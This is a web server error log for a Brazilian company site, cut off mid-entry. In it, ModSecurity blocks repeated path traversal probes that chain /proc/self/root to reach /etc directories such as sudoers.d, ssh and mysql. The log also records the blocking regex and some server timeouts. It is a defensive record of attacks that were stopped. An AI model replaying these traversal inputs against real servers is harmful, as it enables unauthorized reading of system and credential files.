[Thu Mar 19 11:50:06.086074 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:36916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNGwbLMZ6AikZjR9VkhwAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:06.177787 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41006] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:50:11.470521 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:55266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNI8df6f5d65gmYZR-5gAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:11.562740 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.228.61:38010] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwNIxkFeYa1D6dYQnD34AAAAcU"]
[Thu Mar 19 11:50:16.567388 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:55274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNKAbLMZ6AikZjR9VklAAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:20.798415 2026] [:error] [pid 17653:tid 140411708356352] [client 57.141.18.124:43924] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwNLMdf6f5d65gmYZR-6AAAAsQ"]
[Thu Mar 19 11:50:24.416895 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:33510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNMNa6ubjKNq_cu4ZckgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:27.171435 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:33526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNMxkFeYa1D6dYQnD36gAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:29.127192 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41500] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:50:29.455058 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:37864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNNeoXxyEfFpUF8f8U1QAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:31.388387 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:37870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNN_u8EFLIOrSqIpuujgAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:33.668721 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:37872] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNOeyqAr6etmhZHNpnfQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:34.971246 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.106:44288] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwNOgkwaGbbGflqUZDLAQAAANg"]
[Thu Mar 19 11:50:35.155484 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:37878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNOwkwaGbbGflqUZDLAwAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:36.511216 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:37888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNPAkwaGbbGflqUZDLBQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:38.864102 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:57872] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNPta6ubjKNq_cu4ZcnwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:40.225704 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:57882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNQNa6ubjKNq_cu4ZcoQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:40.297255 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:37650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNQNa6ubjKNq_cu4ZcogAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:41.566012 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:57896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNQda6ubjKNq_cu4ZcpwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:44.015550 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:57912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNQvu8EFLIOrSqIpuukQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:47.905811 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 57.141.18.17:44398] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:50:48.095542 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:57916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNSOoXxyEfFpUF8f8U3QAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:49.541404 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:33342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNSeoXxyEfFpUF8f8U4QAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:50.085841 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41934] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:50:51.048217 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.241.31:33348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNSxkFeYa1D6dYQnD3-QAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:52.353803 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:33364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNTNa6ubjKNq_cu4ZctgAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:50:54.370789 2026] [mime_magic:error] [pid 26799:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:47346] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/systemd/system
[Thu Mar 19 11:50:54.370921 2026] [access_compat:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:47346] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/systemd/system
[Thu Mar 19 11:51:02.594983 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:33376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNVv-YZRR_7pZ7nDKSwwAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:04.667977 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:51004] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 